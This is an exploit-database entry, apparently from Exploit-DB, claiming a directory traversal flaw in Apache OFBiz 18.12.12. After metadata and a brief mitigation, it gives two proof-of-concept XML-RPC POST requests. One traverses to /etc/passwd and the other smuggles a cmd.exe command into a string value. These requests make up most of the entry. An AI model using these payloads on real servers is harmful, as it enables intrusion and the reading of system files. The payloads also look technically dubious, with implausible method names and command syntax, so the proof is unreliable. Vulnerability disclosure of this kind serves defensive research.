Apache OFBiz 18.12.12 - Directory Traversal

vendor:

OFBiz

by:

Abdualhadi Khalifa

6.1

CVSS

HIGH

Directory Traversal

CWE

Product Name: OFBiz

Affected Version From: 18.12.12

Affected Version To: 18.12.12

Patch Exists: NO

Related CWE:

CPE: a:apache:ofbiz

Metasploit:

Other Scripts:

Platforms Tested: Windows

2024

Apache OFBiz 18.12.12 – Directory Traversal

Apache OFBiz version 18.12.12 and below is vulnerable to directory traversal. An attacker can exploit this vulnerability by sending a crafted XML request to the '/webtools/control/xmlrpc' endpoint, allowing them to access files outside of the web root directory, such as sensitive system files like '/etc/passwd' or executing commands on the server.

Mitigation:

To mitigate this vulnerability, it is recommended to update Apache OFBiz to a version above 18.12.12 and restrict access to the '/webtools/control/xmlrpc' endpoint if not needed.

Source

Exploit-DB raw data:

# Exploit Title: Apache OFBiz 18.12.12 - Directory Traversal
# Google Dork: N/A
# Date: 2024-05-16
# Exploit Author: [Abdualhadi khalifa (https://twitter.com/absholi_ly)
# Vendor Homepage: https://ofbiz.apache.org/
## Software Link: https://ofbiz.apache.org/download.html
# Version: below <=18.12.12
# Tested on: Windows10


Poc.
1-
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml

<?xml version="1.0"?>
<methodCall>
  <methodName>example.createBlogPost</methodName>
  <params>
    <param>
      <value><string>../../../../../../etc/passwd</string></value>
    </param>
  </params>
</methodCall>

OR

2-
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml

<?xml version="1.0"?>
<methodCall>
  <methodName>performCommand</methodName>
  <params>
    <param>

<value><string>../../../../../../windows/system32/cmd.exe?/c+dir+c:\</string></value>
    </param>
  </params>
</methodCall>